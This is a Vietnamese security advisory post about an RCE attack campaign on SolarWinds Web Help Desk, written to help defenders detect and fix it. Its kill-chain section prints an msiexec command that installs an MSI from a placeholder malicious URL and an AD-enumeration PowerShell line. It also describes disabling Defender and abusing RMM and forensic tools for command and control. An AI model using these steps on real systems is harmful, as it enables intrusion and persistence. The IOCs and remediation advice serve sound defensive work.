Chào anh em,

Cộng đồng bảo mật vừa ghi nhận làn sóng tấn công mới nhắm vào SolarWinds Web Help Desk (WHD). Kẻ tấn công không chỉ khai thác lỗ hổng để chiếm quyền điều khiển (RCE) mà còn sử dụng những kỹ thuật rất tinh vi: dùng chính các công cụ quản trị hợp pháp (như Zoho Assist, Velociraptor) để ẩn mình và duy trì quyền truy cập.

Dưới đây là phân tích kỹ thuật chi tiết về chuỗi tấn công (Kill Chain) và các biện pháp khắc phục khẩn cấp.

1. Thông tin lỗ hổng và Tình hình thực tế

• Mục tiêu: SolarWinds Web Help Desk (WHD).
• Loại lỗ hổng: Remote Code Execution (RCE).
• Thực trạng: Theo Huntress, đã phát hiện hơn 84 điểm cuối (endpoints) tại 78 tổ chức bị xâm nhập. Kẻ tấn công đang tích cực quét và vũ khí hóa lỗ hổng này.

2. Phân tích Chuỗi tấn công (Attack Kill Chain)

Kẻ tấn công thực hiện một quy trình rất bài bản, từ xâm nhập ban đầu cho đến khi thiết lập kênh C2 (Command & Control) kiên cố:

• Bước 1: Xâm nhập ban đầu (Initial Access) Kẻ tấn công khai thác lỗ hổng để buộc tiến trình wrapper.exe (của WHD) gọi java.exe (Tomcat), sau đó java.exe gọi cmd.exe để chạy lệnh cài đặt MSI từ xa. Lệnh thực thi điển hình: wrapper.exe -> java.exe -> cmd.exe /c msiexec.exe /q /i [URL_Payload_Malicious]
• Bước 2: Cài đặt công cụ quản trị từ xa (RAT/RMM Deployment) Thay vì dùng malware lạ dễ bị AV chặn, hacker cài đặt Zoho ManageEngine RMM (Zoho Assist). Đây là phần mềm hợp pháp, nên rất khó bị phát hiện. Hacker đăng ký agent này vào tài khoản Zoho của chúng để điều khiển máy chủ nạn nhân một cách "đàng hoàng".
• Bước 3: Do thám và Di chuyển ngang (Discovery & Lateral Movement) Sử dụng tiến trình của Zoho (TOOLSIQ.EXE), hacker chạy PowerShell để liệt kê toàn bộ máy tính trong mạng Active Directory: Get-ADComputer -Filter * -Property *
• Bước 4: Thiết lập C2 bằng công cụ DFIR (Persistence) Đây là bước "gậy ông đập lưng ông". Hacker cài đặt Velociraptor - một công cụ điều tra số (Forensic) mã nguồn mở rất mạnh. Chúng dùng phiên bản cũ (0.73.4) có lỗ hổng leo thang đặc quyền, biến Velociraptor thành một C2 server hoàn hảo để thực thi lệnh và thu thập dữ liệu, ẩn sau hạ tầng Cloudflare Worker.
• Bước 5: Vô hiệu hóa phòng thủ (Defense Evasion) Chạy các lệnh PowerShell mã hóa Base64 để tắt Windows Defender và Windows Firewall, sau đó cài thêm Cloudflared để tạo đường hầm (tunnel) dự phòng.

3. Chỉ số thỏa hiệp (IOCs) cần rà soát ngay

Anh em SysAdmin kiểm tra ngay hệ thống của mình xem có các dấu hiệu sau không:

• Tiến trình lạ: wrapper.exe hoặc java.exe sinh ra cmd.exe hoặc powershell.exe bất thường.
• Domain C2: auth.qgtxtebl.workers[.]dev
• Công cụ cài đặt: Sự xuất hiện của Zoho Assist, Velociraptor hoặc Cloudflared mà không phải do IT cài đặt.

4. Hướng dẫn khắc phục (Remediation)

• Cập nhật khẩn cấp: Nâng cấp SolarWinds WHD lên phiên bản 2026.1 hoặc mới hơn ngay lập tức. Bản này đã vá các lỗ hổng CVE-2025-26399, CVE-2025-40536 và CVE-2025-40551.
• Cách ly hệ thống: Nếu chưa thể patch ngay, hãy ngắt kết nối WHD khỏi Internet public. Chỉ cho phép truy cập qua VPN nội bộ.
• Rà soát lại tài khoản: Đổi toàn bộ mật khẩu quản trị, kiểm tra xem có tài khoản lạ nào được tạo mới không.

Kết luận: Vụ việc này cho thấy xu hướng Living-off-the-Land (LotL) đang ngày càng nguy hiểm. Hacker không cần malware phức tạp, chúng dùng chính công cụ của admin để đánh lại admin.

Anh em check hệ thống ngay và luôn nhé! Chúc anh em an toàn.


​